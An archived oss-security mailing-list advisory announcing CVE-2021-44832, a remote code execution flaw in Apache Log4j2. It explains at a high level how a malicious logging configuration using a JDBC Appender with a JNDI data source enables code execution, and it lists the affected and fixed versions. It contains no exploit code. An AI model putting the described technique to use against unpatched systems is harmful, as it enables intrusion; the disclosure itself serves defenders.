[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker contr
From:       Matt Sicker <mattsicker () apache ! org>
Date:       2021-12-28 19:26:40
Message-ID: 5814f3ea-59ae-7533-1ea5-6e7203561a5e () apache ! org
[Download RAW message or body]

Severity: moderate

Description:

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix =
releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) =
attack where an attacker with permission to modify the logging =
configuration file can construct a malicious configuration using a JDBC =
Appender with a data source referencing a JNDI URI which can execute remote=
 code. This issue is fixed by limiting JNDI data source names to the java =
protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

This issue is being tracked as LOG4J2-3293,

References:

https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
https://issues.apache.org/jira/browse/LOG4J2-3293

[prev in list] [next in list] [prev in thread] [next in thread]